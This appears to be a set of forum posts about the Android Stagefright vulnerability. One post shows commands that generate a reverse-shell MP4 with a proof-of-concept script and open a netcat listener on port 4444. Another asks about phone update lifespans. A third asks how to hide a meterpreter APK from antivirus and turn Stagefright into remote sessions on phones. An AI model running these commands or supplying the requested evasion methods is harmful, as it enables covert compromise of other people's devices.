Search the Community

Hi guys, after the discovery of the Stagefright bug, the researcher of Zimperium have post a python script for the specific module CVE 1538. I've download it and i've try to execute this on my Android phone with Lollipop 5.0. Before this, i've downloaded the apk of zimperium to test if my phone is vulnerable. The app show me, in green, the module CVE-1538 e other... After this, on my linux pc with python 2.7.x, i've renamed the script in mp4.py for resolve an error of import. After this i've tried to generate the file.mp4 with this command: $python2 mp4.py -c [LAN IP] -p 4444 The script correctly generate an file.mp4 without an error. After i've launch a listener with: $netcat -l -p 4444 I've sended the file.mp4 to my smartphone and i've tried to exec this. The terminal with netcat don't show anything, no result, nisba, nada... I've tried with metasploit listener with multi/hanlder but with a same result. Any solution? Thanks everyone and sorry for my english ;-P

hello everyone, i was wonder about support regard security issues/exploits. so like most of you guys i also carry a "smartphone" (android in this case). what do you guys think the support on a "smartphone" should be? 2 years, 3 year, 5 years? and should it receive security updates even a year after the mentioned years? also i own a HTC One M7 (android) should in this case HTC (and or any other brand) make a security update for a phone regarding the fact that it is 3 years old because of the stagefright exploit? Thank in advance and sorry if the reading is wonky

Hi, I have a great interest in computer security and research exploits and pen-testing techniques as a hobby. Recently I started looking into mobile devices. Android in specific because of the stagefright exploit that was recently released but I'm not an expert so I'm having trouble trying to use it. I usually use metasploit for my testing but not sure how to use the stagefright exploit with it. All I've been able to do so far is create an apk file with an android meterpreter payload and set up a multi handler listener in a vps so I can catch the connections. It works on some phones if it doesn't have any security on them but when they have lookout or some other anti-virus software it kills the sessions or doesn't allow them at all. I'm looking for a little help. Is there a way to encode the apk file so it doesn't get detected by the anti-virus software or another attack that should be more successful like embedding the payload on a web page? Also if anyone can point me in the right direction on how to use the stagefright exploit to create a meterpreter session I would appreciate it. Thanks,